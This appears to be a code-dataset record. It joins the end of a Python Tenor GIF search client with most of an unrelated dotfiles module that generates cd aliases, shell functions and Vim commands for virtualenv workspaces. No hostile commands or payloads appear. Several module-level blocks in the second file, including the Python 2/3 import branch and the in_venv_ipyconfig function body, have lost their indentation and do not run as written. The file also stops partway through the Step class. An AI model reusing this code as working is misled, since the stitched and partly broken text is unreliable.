    async HTTP client or running these in a thread executor.
    """
    def __init__(self):
        # API key comes from application settings; filters are fixed.
        settings = get_settings()
        self.api_key = settings.tenor_api_key
        self.search_endpoint = "https://g.tenor.com/v1/search"
        self.gifs_endpoint = "https://g.tenor.com/v1/gifs"
        self.content_filter = "low"
        self.media_filter = "minimal"
    async def search_gifs(self, search_term: str, limit: int = 10, media_filter: Optional[str] = None):
        # Search Tenor for `search_term`; `media_filter` overrides the
        # instance default when given. Raises on any non-2xx response.
        params = {
            "q": search_term,
            "limit": limit,
            "key": self.api_key,
            "content_filter": self.content_filter,
            "media_filter": media_filter if media_filter else self.media_filter,
        }
        response = requests.get(self.search_endpoint, params=params)
        if not response.ok:
            raise Exception(f"problem fetching gifs. q:{search_term} {response.status_code} {response.text}")
        gifs = response.json().get("results")
        return gifs
    async def get_gif_by_id(self, gif_id: str):
        # Fetch a single GIF record by Tenor id. Raises on non-2xx, and
        # IndexError if the id yields no results.
        params = {
            "ids": gif_id,
            "key": self.api_key,
        }
        response = requests.get(self.gifs_endpoint, params=params)
        if not response.ok:
            raise Exception(f"problem getting gif with id {gif_id}: {response.status_code} {response.text}")
        gifs = response.json().get("results")[0]
        return gifs
| StarcoderdataPython |
85871 | <filename>etc/ipython/ipython_config.py
#!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
"""
dotfiles.venv.venv_ipyconfig
==============================
venv_ipyconfig.py (venv)
Create virtual environment configurations
with a standard filesystem hierarchy overlay
and cd aliases for Bash, ZSH, Vim, and IPython
for use with virtualenv, virtualevwrapper,
and anything that has or should have
a prefix like ``VIRTUAL_ENV`` and
directories like
``./bin``, ``./etc``, ``./var/log``, and ``./src``.
Functional comparisons:
* T-Square, Compass, Table Sled, Stencil, Template, Floorplan, Lens
Venv Implementation
-------------------
- create an :py:mod:`Env` (``env = Env()``)
- define ``__WRK`` workspace root
- define ``VIRTUAL_ENV``, ``_SRC``, ``_ETC``, ``_WRD``
- define ``WORKON_HOME``
- create and add :py:mod:`Steps` (``builder.add_step(step_func)``)
- define variables like ``env['__WRK']`` (``Venv.env.environ['PATH']``)
- define IPython shell command aliases (``Env.aliases``,
``e``, ``ps``, ``git``, ``gitw``)
- create a :py:mod:`StepBuilder` (``builder = StepBuilder()``)
- build a new env from steps: ``new_env = builder.build(env)``
- print an :py:mod:`Env`to:
- ``--print-json`` -- JSON (Env.to_dict, Env.to_json)
- ``--print-ipython`` -- IPython configuration (Env.environ, Env.aliases)
- ``--print-bash`` -- Bash configuration (Env.environ, Env.aliases)
- ``--print-bash-cdalias`` -- Bash configuration (Env.environ, Env.aliases)
- ``--print-zsh`` ZSH -- configuration (Env.environ, Env.aliases)
- ``--print-zsh-cdalias`` -- ZSH configuration (Env.environ, Env.aliases)
- ``--print-vim-cdalias`` -- Vim configuration (Env.aliases)
- generate and source CdAliases that expand and complete where possible
(``cdwrk``, ``cdwrd``, ``cdw``)
- define CdAliases in venv_ipyconfig.py (this file)
- generate venv.sh (``cdwrk``)
- generate venv.vim (``:Cdwrk``)
- generate venv_cdmagic.py (``%cdwrk``, ``cdwrk``)
.. note::
This module may only import from the Python standard library,
so that it always works as ``~/.ipython/profile_default/venv_ipyconfig.py``
"""
import collections
import copy
import difflib
import distutils.spawn
import functools
import inspect
import itertools
import json
import logging
import os
import pprint
import site
import subprocess
import sys
import unittest
from collections import OrderedDict
from os.path import join as joinpath
# try/except imports for IPython
# import IPython
# import zmq
## import sympy
if sys.version_info[0] == 2:
STR_TYPES = basestring
str_center = unicode.center
import StringIO as StringIO_
StringIO = StringIO_.StringIO
# workaround for Sphinx autodoc bug
import __builtin__
def print(*args, **kwargs):
__builtin__.print(*args, **kwargs)
else:
STR_TYPES = str
str_center = str.center
import io
StringIO = io.StringIO
LOGNAME = 'venv'
log = logging.getLogger(LOGNAME)
__THISFILE = os.path.abspath(__file__)
# __VENV_CMD = "python {~venv_ipyconfig.py}"
# __VENV_CMD = "python %s" % __THISFILE
IN_IPYTHON = 'get_ipython' in locals()
IN_IPYTHON_CONFIG = 'get_config' in globals()
#print(("IN_IPYTHON", IN_IPYTHON))
#print(("IN_IPYTHON_CONFIG", IN_IPYTHON_CONFIG))
if IN_IPYTHON_CONFIG:
IPYTHON_CONFIG = get_config()
else:
IPYTHON_CONFIG = None
def in_venv_ipyconfig():
"""
Returns:
bool: True if ``get_ipython`` is in ``globals()``
"""
return IN_IPYTHON_CONFIG
DEBUG_TRACE_MODPATH = False
def logevent(event,
             obj=None,
             logger=log,
             level=logging.DEBUG,
             func=None,
             lineno=None,
             modpath=None,
             show_modpath=None,
             wrap=False,
             splitlines=True):
    """Serialize *obj* and log it under the *event* key.

    Args:
        event (str): an event key (tab characters are escaped to ``<tab/>``)
        obj (object): thing to serialize (``to_json(indent=2)`` when
            available, otherwise ``pprint.pformat``) and log
        logger (logging.Logger): logger to log to
        level (int): logging loglevel for each emitted record
        func (callable or str): optional function (or name) appended to the
            call-path annotation
        lineno (int): unused; kept for interface compatibility
        modpath (list): pre-built call path; when None and *show_modpath*
            is true, it is rebuilt by walking the caller's stack
        show_modpath (bool): include a call-path suffix
            (default: module flag ``DEBUG_TRACE_MODPATH``)
        wrap (bool): add ``<event>`` header/footer records (default: False)
        splitlines (bool): split output by newlines and emit one log record
            per line (default: True)

    Returns:
        tuple: (event:str, output:str)
    """
    eventstr = event.replace('\t', '<tab/>')
    if show_modpath is None:
        show_modpath = DEBUG_TRACE_MODPATH
    if show_modpath and modpath is None:
        # Walk the call stack, collecting [name, lineno] entries.
        # BUGFIX: entries are now *lists* (they used to be tuples), because
        # the ``modpath[-1][0] = ...`` rewrite below mutates them, which
        # raised TypeError on tuples.
        modpath = []
        _frame = sys._getframe(1)
        if _frame:
            name = _frame.f_code.co_name
            if name == '<module>':
                name = _frame.f_globals['__name__']
            modpath.append([name, _frame.f_lineno])
            while hasattr(_frame, 'f_back'):
                _frame = _frame.f_back
                if hasattr(_frame, 'f_code') and hasattr(_frame, 'f_lineno'):
                    name = _frame.f_code.co_name
                    if name == '<module>':
                        name = "%s %s" % (
                            _frame.f_globals['__name__'],
                            os.path.basename(_frame.f_code.co_filename),
                        )
                    modpath.append([name, _frame.f_lineno])
            if hasattr(_frame, 'f_globals'):
                # Rewrite the outermost entry's name with the module name.
                modpath[-1][0] = _frame.f_globals['__name__']
    funcstr = None
    if func is not None:
        funcstr = getattr(func, '__name__',
                          func if isinstance(func, STR_TYPES)
                          else None)
        if modpath:
            modpath.append([funcstr])
    if modpath:
        # BUGFIX: the single-element func entry used to break the strict
        # ``for x, y in modpath`` unpacking; handle both entry shapes.
        funcstr = ' '.join(
            "%s +%d" % (entry[0], entry[1]) if len(entry) > 1
            else str(entry[0])
            for entry in modpath)

    def add_event_prefix(eventstr, line, funcstr=funcstr):
        # Append the call-path annotation only when one was built.
        if funcstr:
            fmtstr = '{eventstr}\t{line}\t##{funcstr}'
        else:
            fmtstr = '{eventstr}\t{line}'
        return fmtstr.format(
            eventstr=eventstr,
            line=line,
            funcstr=funcstr)

    def _log(event, output):
        logger.log(level, add_event_prefix(event, output))

    if wrap:
        _log(event, '# <{eventstr}>'.format(eventstr=eventstr))
    if hasattr(obj, 'to_json'):
        output = obj.to_json(indent=2)
    else:
        output = pprint.pformat(obj)
    if splitlines:
        for line in output.splitlines():
            _log(event, line)
    else:
        _log(event, output)
    if wrap:
        _log(event, '# </{eventstr}>'.format(eventstr=eventstr))
    return (event, output)
# Exception classes
class ConfigException(Exception):
    """Raised when venv configuration is invalid."""
    pass
class StepException(Exception):
    """Raised when a build Step fails."""
    pass
class StepConfigException(StepException, ConfigException):
    """Raised when a build Step's configuration is invalid."""
    pass
def prepend_comment_char(strblock, commentchar="##"):
    """
    Prefix each line of a string block with a comment marker.

    Args:
        strblock (str): string to split by newlines
        commentchar (str): comment prefix (default: ``"##"``); one space
            is inserted between the prefix and each line
    Yields:
        str: lines prefixed with ``commentchar``
    """
    for _line in strblock.splitlines():
        yield "%s %s" % (commentchar, _line)
# Constant getters (for now)
def get_pyver(pyverstr=None):
    """
    Build a ``pythonX.Y`` directory-name string.

    Keyword Arguments:
        pyverstr (str): "major.minor" e.g. ``2.7`` or ``3.4``
            (default: ``sys.version_info[:2]``)
    Returns:
        str: e.g. ``python2.7``, ``python3.4``
    """
    if pyverstr is not None:
        return 'python%s' % pyverstr
    return 'python%d.%d' % sys.version_info[:2]
def get___WRK_default(env=None, **kwargs):
    """
    Determine the default workspace path (``__WRK``).

    Lookup order: ``kwargs['__WRK']``, ``env['__WRK']``, then ``~/-wrk``.

    Keyword Arguments:
        env (Env): Env mapping to read ``__WRK`` from (default: ``Env()``)
        __WRK (str): explicit workspace path override
    Returns:
        str: workspace path
    """
    if env is None:
        env = Env()
    fallback = os.path.expanduser('~/-wrk')
    __WRK = kwargs.get('__WRK', env.get('__WRK', fallback))
    log.debug('get__WRK\t%s' % {'__WRK': __WRK,
                                'env[__WRK]': env.get('__WRK')})
    return __WRK
def get_WORKON_HOME_default(env=None,
                            from_environ=False,
                            default='-ve27',
                            **kwargs):
    """
    Determine the default virtualenvwrapper ``WORKON_HOME`` path.

    Lookup order:

    1. ``env['WORKON_HOME']``
    2. ``env['WORKON_HOME__py27']``
    3. ``joinpath(env['__WRK'], default)``

    Keyword Arguments:
        env (dict): Env dict to read from (default: None -> ``Env()``)
        from_environ (bool): build the Env from os.environ when env is None
        default (str): default WORKON_HOME dirname (default: ``'-ve27'``)
        __WRK (str): workspace path override
    Returns:
        str: path to a ``WORKON_HOME`` directory
    """
    __WORKON_HOME_DEFAULT = default
    if env is None:
        if from_environ:
            env = Env.from_environ(os.environ)  # TODO: os.environ.copy()
        else:
            env = Env()
    # BUGFIX: compute the __WRK default lazily; previously
    # ``get___WRK_default(env=env)`` was evaluated eagerly as a
    # ``dict.get`` default argument even when __WRK was already set
    wrk = kwargs.get('__WRK', env.get('__WRK'))
    if wrk is None:
        wrk = get___WRK_default(env=env)
    env['__WRK'] = wrk
    workon_home = env.get('WORKON_HOME')  # TODO: WORKON_HOME_DEFAULT
    if workon_home:
        return workon_home
    python27_home = env.get('WORKON_HOME__py27')
    if python27_home:
        return python27_home
    # NOTE(review): the original also contained an unreachable
    # ``~/.virtualenvs`` fallback after this point; every branch above
    # already returned, so it is dropped here.
    return joinpath(env['__WRK'], __WORKON_HOME_DEFAULT)
class VenvJSONEncoder(json.JSONEncoder):
    """
    ``json.JSONEncoder`` subclass for serializing venv objects.

    The ``default`` hook checks, in order: a ``to_dict`` method, an
    ``OrderedDict`` instance, a ``to_bash_function`` method, a
    ``to_shell_str`` method, and finally :class:`CdAlias` instances
    (serialized as their ``pathvar``).
    """
    def default(self, obj):
        # objects exposing to_dict() serialize as a plain dict
        if hasattr(obj, 'to_dict'):
            return dict(obj.to_dict())
        if isinstance(obj, OrderedDict):
            # TODO: why is this necessary?
            return dict(obj)
        # shell-renderable objects serialize to their shell string
        if hasattr(obj, 'to_bash_function'):
            return obj.to_bash_function()
        if hasattr(obj, 'to_shell_str'):
            return obj.to_shell_str()
        if isinstance(obj, CdAlias):
            # NOTE(review): CdAlias defines to_bash_function, so this
            # branch appears unreachable — verify before relying on it.
            # return dict(type="cdalias",value=(obj.name, obj.pathvar))
            return obj.pathvar
        # fall through: base class raises TypeError for unserializable objects
        return json.JSONEncoder.default(self, obj)
##############
# define aliases as IPython aliases (which support %l and %s,%s)
# which can then be transformed to:
# * ipython aliases ("echo %l; ping -t %s -n %s")
class CmdAlias(object):
    """
    Base class wrapping a literal command alias string.

    Subclasses override :meth:`to_shell_str` / :meth:`to_ipython_alias`
    to render the alias for a particular shell.
    """

    def __init__(self, cmdstr):
        """
        Args:
            cmdstr (str): command alias string
        """
        self.cmdstr = cmdstr

    def to_shell_str(self, name=None):
        """
        Render this alias for bash/zsh.

        Keyword Arguments:
            name (str): function name override (unused in the base class)
        Returns:
            str: ``self.cmdstr`` unchanged (AS-IS)
        """
        return self.cmdstr

    def to_ipython_alias(self):
        """
        Render this alias for IPython.

        Returns:
            str: ``self.cmdstr`` unchanged (AS-IS)
        """
        return self.cmdstr

    # both str() and repr() render the shell form
    __str__ = to_shell_str
    __repr__ = to_shell_str
class IpyAlias(CmdAlias):
    """
    An IPython-style alias command string.

    When the command contains positional placeholders (``%s``) or the
    whole-line placeholder (``%l``), it renders as a shell function;
    otherwise it renders as a plain shell ``alias``.

    References:
        * TODO: IPython docs
    """

    def __init__(self, cmdstr, name=None, complfuncstr=None):
        """
        Args:
            cmdstr (str): command string; ``%s``/``%l`` trigger expansion
                to a shell function
        Keyword Arguments:
            name (str): alias name; None to set at serialization
                (so that ``$ type cmd`` shows the actual command)
            complfuncstr (str): optional bash completion function body
        """
        self.name = name
        self.cmdstr = cmdstr
        self.complfuncstr = complfuncstr

    def to_shell_str(self, name=None):
        """
        Render this alias for bash/zsh.

        Keyword Arguments:
            name (str): funcname to override default (``self.name``)
        Returns:
            str: an ``alias name='...' ;`` line, or an
            ``eval 'name () {...}';`` function (plus a ``complete``
            registration when ``self.complfuncstr`` is set)
        """
        cmdstr = self.cmdstr
        if name is None:
            name = self.name
        if not ('%s' in cmdstr or '%l' in cmdstr):
            # TODO: repr(alias) / shell_quote / mangling #XXX
            return 'alias {}={} ;'.format(name, repr(cmdstr))
        # number the positional placeholders: %s %s -> ${1} ${2}
        funcbody = cmdstr[:]
        argnum = 0
        while '%s' in funcbody:
            argnum += 1
            funcbody = funcbody.replace('%s', '${%d}' % argnum, 1)
        tmpl = (
            u'eval \'{funcname} () {{\n {funcstr}\n}}\';')
        macro = tmpl.format(funcname=name, funcstr=funcbody)
        macro = macro.replace('%l', '${@}')
        if self.complfuncstr:
            complname = '_%s__complete' % name
            macro = u'%s\n%s\ncomplete -o default -o nospace -F %s %s ;' % (
                macro,
                tmpl.format(
                    funcname=complname,
                    funcstr=self.complfuncstr.strip()),
                complname,
                name)
        return macro
class CdAlias(CmdAlias):
    """
    A CmdAlias for ``cd`` change directory
    functions with venv paths (e.g. $_WRD)
    for Bash, ZSH, IPython, Vim.

    * venv.sh bash functions with tab-completion (cdwrd, cdw, cdw<tab>)
    * venv_ipymagics.py: ipython magics (%cdwrd, cdwrd, cdw)
    * venv.vim: vim functions (:Cdwrd)
    """
    def __init__(self, pathvar, name=None, aliases=None):
        """
        Args:
            pathvar (str): path variable to cd to
        Keyword Arguments:
            name (str): alias name (default: ``pathvar.lower().replace('_', '')``)
                _WRD -> cdwrd, :Cdwrd
                WORKON_HOME -> workonhome
            aliases (list[str]): additional alias names (e.g. ['cdw',])

        .. py:attribute:: BASH_ALIAS_TEMPLATE
        .. py:attribute:: BASH_FUNCTION_TEMPLATE
        .. py:attribute:: BASH_COMPLETION_TEMPLATE
        .. py:attribute:: VENV_IPYMAGICS_FILE_HEADER
        .. py:attribute:: VENV_IPYMAGIC_METHOD_TEMPLATE
        .. py:attribute:: VIM_CD_COMMAND_TEMPLATE
        .. py:attribute:: VIM_CD_FUNCTION_TEMPLATE
        """
        self.pathvar = pathvar
        self.cmdstr = "cd {}".format(self.pathvar)
        if name is None:
            name = pathvar.lower().replace('_', '')
        self.name = name
        if aliases is None:
            aliases = list()
        self.aliases = aliases

    # header of the generated venv_ipymagics.py file
    VENV_IPYMAGICS_FILE_HEADER = ('''
#!/usr/bin/env ipython
# dotfiles.venv.venv_ipymagics
from __future__ import print_function
"""
IPython ``%magic`` commands

* ``cd`` aliases
* ``ds`` (``dotfiles_status``)
* ``dr`` (``dotfiles_reload``)

Installation
--------------
.. code-block:: bash

    __DOTFILES="${HOME}/-dotfiles"
    ipython_profile="profile_default"
    ln -s ${__DOTFILES}/etc/ipython/venv_ipymagics.py \\
        ~/.ipython/${ipython_profile}/startup/venv_ipymagics.py
"""
import os
import sys
try:
    from IPython.core.magic import (Magics, magics_class, line_magic)
except ImportError:
    print("ImportError: IPython")
    # Mock IPython for building docs
    Magics = object
    magics_class = lambda cls, *args, **kwargs: cls
    line_magic = lambda func, *args, **kwargs: func

if sys.version_info.major == 2:
    str = unicode


def ipymagic_quote(_str):
    return str(_str)


@magics_class
class VenvMagics(Magics):
    def cd(self, envvar, line):
        """
        Change directory

        Args:
            envvar (str): os.environ variable name
            line (str): path to append to envvar
        """
        prefix = os.environ.get(envvar, "")
        _dstpath = line.lstrip(os.path.sep)
        path = os.path.join(prefix, _dstpath)
        cmd = ("cd %s" % ipymagic_quote(path))
        print("%" + cmd, file=sys.stderr)
        return self.shell.magic(cmd)''')

    # one %magic method per cd alias name
    VENV_IPYMAGIC_METHOD_TEMPLATE = ('''
    @line_magic
    def {ipy_func_name}(self, line):
        """{ipy_func_name} -- cd ${pathvar}/${{@}}"""
        return self.cd('{pathvar}', line)''')

    VENV_IPYMAGICS_FOOTER = ('''
    @line_magic
    def cdhelp(self, line):
        """cdhelp() -- list cd commands"""
        for cdfunc in dir(self):
            if cdfunc.startswith('cd') and cdfunc not in ('cdhelp','cd'):
                docstr = getattr(self, cdfunc).__doc__.split('--',1)[-1].strip()
                print("%%%-16s -- %s" % (cdfunc, docstr))

    @staticmethod
    def _dotfiles_status():
        """
        Print ``dotfiles_status``: venv variables
        """
        env_vars = [
            'HOSTNAME',
            'USER',
            'PROJECT_HOME',
            'CONDA_ROOT',
            'CONDA_ENVS_PATH',
            'WORKON_HOME',
            'VIRTUAL_ENV_NAME',
            'VIRTUAL_ENV',
            '_USRLOG',
            '_TERM_ID',
            '_SRC',
            '_APP',
            '_WRD',
            'PATH',
            '__DOTFILES',
        ]
        environ = dict((var, os.environ.get(var)) for var in env_vars)
        environ['HOSTNAME'] = __import__('socket').gethostname()
        for var in env_vars:
            print('{}="{}"'.format(var, "%s" % environ.get(var,'')))

    @line_magic
    def dotfiles_status(self, line):
        """dotfiles_status() -- print dotfiles_status() ."""
        return self._dotfiles_status()

    @line_magic
    def ds(self, line):
        """ds() -- print dotfiles_status() ."""
        return self._dotfiles_status()

    @staticmethod
    def _dotfiles_reload():
        """_dotfiles_reload() -- print NotImplemented"""
        print("NotImplemented: dotfiles_reload()")

    @line_magic
    def dotfiles_reload(self, line):
        """dotfiles_reload() -- print NotImplemented"""
        return self._dotfiles_reload()

    @line_magic
    def dr(self, line):
        """dr() -- print NotImplemented [dotfiles_reload()]"""
        return self._dotfiles_reload()


def main():
    """
    Register VenvMagics with IPython
    """
    import IPython
    ip = IPython.get_ipython()
    ip.register_magics(VenvMagics)

if __name__ == "__main__":
    main()
''')

    def to_ipython_method(self):
        """
        Yield IPython ``%magic`` cd-method definitions, one per alias name.

        Yields:
            str: a formatted :py:attr:`VENV_IPYMAGIC_METHOD_TEMPLATE` block
        """
        for cmd_name in self.bash_func_names:
            yield (CdAlias.VENV_IPYMAGIC_METHOD_TEMPLATE.format(
                pathvar=self.pathvar,
                ipy_func_name=cmd_name))

    # BUGFIX: a stray ``endfor`` line (with no matching ``for``) was
    # removed from the generated Compl_Cdhere function below; it made
    # the emitted venv.vim fail to source.
    VIM_HEADER_TEMPLATE = (
        '''\n'''
        '''" ### venv.vim\n'''
        '''" # Src: https://github.com/westurner/venv.vim\n\n'''
        '''" "g:venv_list_only_dirs -- 1 -- 0 to list files in Cd* commands\n\n'''
        '''let g:venv_list_only_dirs = 1\n'''
        '''\n'''
        '''function! Cd_help()\n'''
        '''" :Cdhelp -- list venv.vim cdalias commands\n'''
        ''' :verbose command Cd\n'''
        '''endfunction\n'''
        '''command! -nargs=0 Cdhelp call Cd_help()\n'''
        '''\n'''
        '''function! ListDirsOrFiles(path, ArgLead, ...)\n'''
        ''' let dirsonly = ((a:0>0) ? 1 : g:venv_list_only_dirs)\n'''
        ''' let _glob = '' . a:ArgLead . ((g:venv_list_only_dirs>1) ? '*/' : '*')\n'''
        ''' execute 'lcd' a:path\n'''
        ''' if dirsonly ==? 1\n'''
        ''' let output = map(sort(globpath('.', _glob, 0, 1), 'i'), 'v:val[2:]')\n'''
        ''' elseif dirsonly ==? 0\n'''
        ''' let output = map(sort(globpath('.', _glob, 0, 1), 'i'), 'v:val[2:] . (isdirectory(v:val) ? "/" : "")')\n'''
        ''' endif\n'''
        ''' execute 'lcd -'\n'''
        ''' return output\n'''
        '''endfunction\n'''
        '''\n'''
        '''function! Cdhere(...)\n'''
        '''" :Cdhere -- cd to here (this dir, dirname(__file__)) [cd %:p:h]\n'''
        '''" :CDhere -- cd to here (this dir, dirname(__file__)) [cd %:p:h]\n'''
        ''' let _path = expand('%:p:h') . ((a:0>0) ? ('/' . a:1) : '')\n'''
        ''' execute 'cd' _path\n'''
        ''' pwd\n'''
        '''endfunction\n'''
        '''function! Compl_Cdhere(ArgLead, ...)\n'''
        ''' return ListDirsOrFiles(expand('%:p:h'), a:ArgLead, 1)\n'''
        '''endfunction\n'''
        '''command! -nargs=* -complete=customlist,Compl_Cdhere Cdhere call Cdhere(<f-args>)\n'''
        '''command! -nargs=* -complete=customlist,Compl_Cdhere CDhere call Cdhere(<f-args>)\n'''
        '''\n'''
        '''function! Lcdhere(...)\n'''
        '''" :Lcdhere -- lcd to here (this dir, dirname(__file__)) [lcd %:p:h]\n'''
        '''" :LCdhere -- lcd to here (this dir, dirname(__file__)) [lcd %:p:h]\n'''
        ''' let _path = expand('%:p:h') . ((a:0>0) ? ('/' . a:1) : '')\n'''
        ''' execute 'lcd' _path\n'''
        ''' pwd\n'''
        '''endfunction\n'''
        '''command! -nargs=* -complete=customlist,Compl_Cdhere Lcdhere call Lcdhere(<f-args>)\n'''
        '''command! -nargs=* -complete=customlist,Compl_Cdhere LCdhere call Lcdhere(<f-args>)\n'''
        '''\n'''
        '''\n'''
        '''function! Cd___VAR_(varname, cmd, ...)\n'''
        '''" Cd___VAR_() -- cd expand('$' . a:varname)/$1\n'''
        ''' let _VARNAME = a:varname\n'''
        ''' let _VAR_=expand(_VARNAME)\n'''
        ''' if _VARNAME ==? _VAR_\n'''
        ''' echoerr _VARNAME . " is not set"\n'''
        ''' return\n'''
        ''' endif\n'''
        ''' let pathname = join([_VAR_, (a:0>0) ? a:1 : ""], "/")\n'''
        ''' execute a:cmd pathname\n'''
        ''' pwd\n'''
        '''endfunction\n'''
        '''\n'''
    )

    VIM_CD_FUNCTION_TEMPLATE = (
        '''\n'''
        '''function! {vim_func_name}(...)\n'''
        '''" {vim_func_name}() -- cd ${pathvar}/$1\n'''
        ''' call Cd___VAR_('${pathvar}', '{vim_cd_func}', (a:0>0)? a:1 : "")\n'''
        '''endfunction\n'''
        '''function! Compl_{vim_func_name}(ArgLead, ...)\n'''
        ''' return ListDirsOrFiles(${pathvar}, a:ArgLead, 1)\n'''
        '''endfunction\n'''
    )

    VIM_CD_COMMAND_TEMPLATE = (
        '''" :{cmd_name:<10} -- cd ${pathvar}/$1\n'''
        """command! -nargs=* -complete=customlist,Compl_{vim_func_name} {cmd_name} call {vim_func_name}(<f-args>)\n"""
    )

    VIM_EDIT_FUNCTION_TEMPLATE = (
        '''\n'''
        '''function! {vim_func_name}(...)\n'''
        '''" {vim_func_name}() -- e ${pathvar}/$1\n'''
        ''' let _path=expand("${pathvar}") . ((a:0>0)? "/" . a:1 : "")\n'''
        ''' execute '{vim_edit_func}' _path\n'''
        '''endfunction\n'''
        '''function! Compl_{vim_func_name}(ArgLead, ...)\n'''
        ''' return ListDirsOrFiles(${pathvar}, a:ArgLead, 0)\n'''
        '''endfunction\n'''
    )

    VIM_EDIT_COMMAND_TEMPLATE = (
        '''" :{cmd_name:<10} -- e ${pathvar}/$1\n'''
        """command! -nargs=* -complete=customlist,Compl_{vim_func_name} {cmd_name} call {vim_func_name}(<f-args>)\n"""
    )

    @property
    def vim_cmd_name(self):
        """
        Returns:
            str: e.g "Cdwrd"
        """
        return "Cd{}".format(self.name)

    @property
    def vim_cmd_names(self):
        """
        Returns:
            list: self.vim_cmd_name + self.aliases.title()
            (order-preserving, deduplicated; aliases ending in '-' skipped)
        """
        return list(collections.OrderedDict.fromkeys(
            [self.vim_cmd_name, ] +
            [alias.title() for alias in self.aliases
             if not alias.endswith('-')]).keys())

    def to_vim_function(self):
        """
        Returns:
            str: vim function block (cd/lcd functions and commands,
            plus e/tabnew edit functions and commands)
        """
        # cdalias commands: one conf for :Cd* (cd), one for :LCd* (lcd)
        confs = cdalias_confs = []
        conf = {}
        conf['pathvar'] = self.pathvar
        conf['vim_func_name'] = "Cd_" + self.pathvar
        conf['vim_cmd_name'] = self.vim_cmd_name
        conf['vim_cmd_names'] = self.vim_cmd_names
        conf['vim_cd_func'] = 'cd'
        confs.append(conf)
        conf2 = conf.copy()
        conf2['vim_func_name'] = "L" + conf['vim_func_name']
        conf2['vim_cmd_name'] = "L" + conf['vim_cmd_name']
        conf2['vim_cmd_names'] = ["L{}".format(x) for x in conf['vim_cmd_names']]
        conf2['vim_cmd_names'] += ["L{}".format(x).title() for x in conf['vim_cmd_names']]
        conf2['vim_cd_func'] = 'lcd'
        confs.append(conf2)
        output = []
        for conf in confs:
            output.append(CdAlias.VIM_CD_FUNCTION_TEMPLATE.format(**conf))
            for cmd_name in conf['vim_cmd_names']:
                output += (CdAlias.VIM_CD_COMMAND_TEMPLATE
                           .format(cmd_name=cmd_name,
                                   pathvar=conf['pathvar'],
                                   vim_func_name=conf['vim_func_name']),)
        # edit_commands
        # NOTE(review): ``conf`` here is the last (lcd) conf from the
        # loop above; edit command names are derived by stripping the
        # "LCd" prefix (``[3:]``) from its command names.
        edit_cmd_names = list(collections.OrderedDict.fromkeys(
            [x[3:] for x in conf['vim_cmd_names'][1:]]).keys())
        confs = edit_cmd_confs = []
        conf3 = conf.copy()
        conf3['vim_func_name'] = "E" + self.pathvar
        conf3['vim_cmd_name'] = "E" + self.pathvar
        conf3['vim_cmd_names'] = ["E{}".format(x) for x in edit_cmd_names]
        # conf3['vim_cmd_names'] += ["E{}".format(x).title() for x in edit_cmd_names]
        conf3['vim_edit_func'] = 'e'
        confs.append(conf3)
        conf4 = conf.copy()
        conf4['vim_func_name'] = "Tabnew" + self.pathvar
        conf4['vim_cmd_name'] = "Tabnew" + self.pathvar
        conf4['vim_cmd_names'] = ["Tabnew{}".format(x) for x in edit_cmd_names]
        # conf4['vim_cmd_names'] += ["Tabnew{}".format(x).title() for x in edit_cmd_names]
        conf4['vim_edit_func'] = 'tabnew'
        confs.append(conf4)
        for conf in confs:
            output.append(CdAlias.VIM_EDIT_FUNCTION_TEMPLATE.format(**conf))
            for cmd_name in conf['vim_cmd_names']:
                output += (CdAlias.VIM_EDIT_COMMAND_TEMPLATE
                           .format(cmd_name=cmd_name,
                                   pathvar=conf['pathvar'],
                                   vim_func_name=conf['vim_func_name']),)
        output.append(
            '''\n'''
        )
        return u''.join(output)

    BASH_CDALIAS_HEADER = (
        '''#!/bin/sh\n'''
        """## venv.sh\n"""
        """# generated from $(venv --print-bash --prefix=/)\n"""
        """\n""")

    BASH_FUNCTION_TEMPLATE = (
        """{bash_func_name} () {{\n"""
        """ # {bash_func_name:16} -- cd ${pathvar} /$@\n"""
        """ [ -z "${pathvar}" ] && echo "{pathvar} is not set" && return 1\n"""
        """ cd "${pathvar}"${{@:+"/${{@}}"}}\n"""
        """}}\n"""
        """{bash_compl_name} () {{\n"""
        """ local cur="$2";\n"""
        """ COMPREPLY=($({bash_func_name} && compgen -d -- "${{cur}}" ))\n"""
        """}}\n"""
    )

    BASH_ALIAS_TEMPLATE = (
        """{cmd_name} () {{\n"""
        """ # {cmd_name:16} -- cd ${pathvar}\n"""
        """ {bash_func_name} $@\n"""
        """}}\n"""
    )

    BASH_COMPLETION_TEMPLATE = (
        """complete -o default -o nospace -F {bash_compl_name} {cmd_name}\n"""
    )

    @property
    def bash_func_name(self):
        """
        Returns:
            str: e.g. "cdwrd"
        """
        return "cd{}".format(self.name)

    @property
    def bash_func_names(self):
        """
        Returns:
            list: self.bash_func_name + self.aliases
        """
        return [self.bash_func_name, ] + self.aliases

    def to_bash_function(self, include_completions=True):
        """
        Keyword Arguments:
            include_completions (bool): generate inline Bash completions
        Returns:
            str: bash function block (primary function, alias wrappers,
            and optional ``complete`` registrations)
        """
        conf = {}
        conf['pathvar'] = self.pathvar
        conf['bash_func_name'] = self.bash_func_name
        conf['bash_func_names'] = self.bash_func_names
        conf['bash_compl_name'] = "_cd_%s_complete" % self.pathvar

        def _iter_bash_function(conf):
            yield (CdAlias.BASH_FUNCTION_TEMPLATE.format(**conf))
            for cmd_name in conf['bash_func_names'][1:]:
                yield (CdAlias.BASH_ALIAS_TEMPLATE
                       .format(cmd_name=cmd_name,
                               pathvar=conf['pathvar'],
                               bash_func_name=conf['bash_func_name']))
            if include_completions:
                for cmd_name in conf['bash_func_names']:
                    yield (CdAlias.BASH_COMPLETION_TEMPLATE
                           .format(cmd_name=cmd_name,
                                   bash_compl_name=conf['bash_compl_name']))
        return ''.join(_iter_bash_function(conf))

    # def to_shell_str(self):
    #     return 'cd {}/%l'.format(shell_varquote(self.PATH_VARIABLE))
    def to_shell_str(self):
        """
        Returns:
            str: ``eval '<bash function block>';``
        """
        return """eval \'\n{cmdstr}\n\';""".format(
            cmdstr=self.to_bash_function())

    __str__ = to_shell_str
#######################################
# def build_*_env(env=None, **kwargs):
# return env
#######################################
class Step(object):
    """
    A build task step which builds or transforms an
    :py:mod:`Env`, by calling ``step.build(env=env, **step.conf)``
    """

    def __init__(self, func=None, **kwargs):
        """
        Keyword Arguments:
            func (callable): ``function(env=None, **kwargs)``
                (default: :attr:`Step.DEFAULT_FUNC`)
            name (str): a name for the step
            conf (dict): a configuration dict (instead of kwargs) for this step
        """
        if not func:
            func = self.DEFAULT_FUNC
        self.func = func
        self._name = kwargs.get('name')
        # NOTE(review): this instance attribute shadows the ``build``
        # method below, so ``step.build(...)`` calls ``func`` directly
